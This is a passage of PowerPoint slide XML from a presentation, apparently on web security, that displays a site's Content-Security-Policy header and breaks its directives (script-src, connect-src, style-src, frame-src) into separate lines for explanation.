                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690687"/>
            <a:ext cx="10515600" cy="4486275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self'; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-Cu2iEd9m9M2VMJ2cxldhng==' 'strict-dynamic' 'self' https:; connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https: cdn.cookielaw.org; style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' 'unsafe-inline' cdn.cookielaw.org *.onetrust.com *.google.com *.google.nl *.googletagmanager.com fonts.googleapis.com; frame-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https://*.gotowebinar.com/ https://www.youtube.com/ https://open.spotify.com https://*.orangecyberdefense.com https://www.orangecyberdefense.com; font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' https://fonts.gstatic.com https://fonts.googleapis.com https://www.googletagmanager.com data:; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' https: data:; manifest-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' *.akamai-access.com; object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none'; base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none'; report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https://reports.ocd-staging.multimediabs.com/csp https://reports.ocd-staging.multimediabs.com/log; report-to reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"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746673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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1574518"/>
            <a:ext cx="10515600" cy="4918357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-Cu2iEd9m9M2VMJ2cxldhng==' 'strict-dynamic' 'self' https:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https: cdn.cookielaw.org;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self’; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' 'unsafe-inline' cdn.cookielaw.org *.onetrust.com *.google.com *.google.nl *.googletagmanager.com fonts.googleapis.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frame-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https://*.gotowebinar.com/ https://www.youtube.com/ https://open.spotify.com https://*.orangecyberdefense.com https://www.orangecyberdefense.com; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1093235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CFC087-512E-65C4-9F0B-D14A5381F409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883628" y="1633557"/>
            <a:ext cx="1714500" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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68102CCD-6AAB-A75C-1416-B34604FF8190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893276" y="3483509"/>
            <a:ext cx="981809" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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902258C4-2ACB-826B-89AE-E382FDCEF886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893278" y="2992698"/>
            <a:ext cx="981808" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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871DCEE-C11C-D4D4-FF8C-9FE2240C6BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893278" y="2539651"/>
            <a:ext cx="2520460" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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DDB74DB-2FD4-D3E4-7F13-5D07DAE6C66B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893278" y="2086604"/>
            <a:ext cx="5140568" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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a:xfrm>
            <a:off x="838200" y="393237"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F57F47-9798-B2A3-D18A-17FEB1B843A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950976" y="3956896"/>
            <a:ext cx="1799550" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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6561039-00FB-3104-971E-A8BD467D09E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950976" y="5307295"/>
            <a:ext cx="1799550" cy="241827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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61739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1550705"/>
            <a:ext cx="10515600" cy="4486275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E8EAED"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'nonce-Cu2iEd9m9M2VMJ2cxldhng=='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'strict-dynamic'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'self'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E8EAED"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cdn.cookielaw.org;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
